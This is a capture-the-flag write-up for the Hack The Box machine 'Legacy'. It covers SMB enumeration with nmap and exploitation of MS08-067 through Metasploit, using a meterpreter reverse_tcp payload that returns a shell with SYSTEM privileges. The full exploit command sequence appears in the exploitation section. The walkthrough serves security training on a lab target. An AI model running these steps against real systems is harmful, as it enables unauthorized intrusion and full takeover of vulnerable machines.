Legacy Writeup

10 September 2022 #CTF #HTB #box #easy #linux

legacy info

Enumeration

You already know: it's nmap time:

$ sudo nmap -n -p- -T4 -oN enum/fulltcp.nmap 10.10.10.4
[...]
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
[...]
$ ports=$(awk -F/ '/^[[:digit:]]{1,5}\// {printf "%s,", $1}' enum/fulltcp.nmap)
$ sudo nmap -n -p $ports -sCV -oN enum/scripts-tcp.nmap 10.10.10.4
[...]
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b9522a (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-11-12T19:13:12+02:00
|_clock-skew: mean: 5d00h57m39s, deviation: 1h24m50s, median: 4d23h57m39s
[...]

RPC

Let's see if we can use rcp to get some info (like username):

$ rpcclient -N 10.10.10.4
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

-N specifies we want to use null authentication (no password).

But it looks like we need a valid account for that.

SMB

Let's try to list shares:

$ smbclient -N -L 10.10.10.4
session setup failed: NT_STATUS_INVALID_PARAMETER
$ smbclient -U guest -N -L 10.10.10.4
session setup failed: NT_STATUS_LOGON_FAILURE

Again, looks like we need a valid account in order to list shares.

Our nmap scan revealed that the Windows version is extremely old (Windows XP so around 2001-2008!). Let's use nmap again, this time to check if the box is vulnerable to some known exploits:

$ sudo nmap --script 'smb-vuln-*' -p 139,445 -oN enum/smb-vuln.nmap 10.10.10.4
[...]
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
[...]
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
[...]

Wow, we have the luxury to choose between 2 known CVEs. How nice.

EXPLOITATION

The second CVE was released in 2008, which corresponds to the end of life of Windows XP, so we'll use this one.

Metasploit time:

$ msfconfole
[...]
msf6 > search MS08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms08_067_netapi) > run
[...]
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Key Takeaways

Old Windows version == Free Real Estate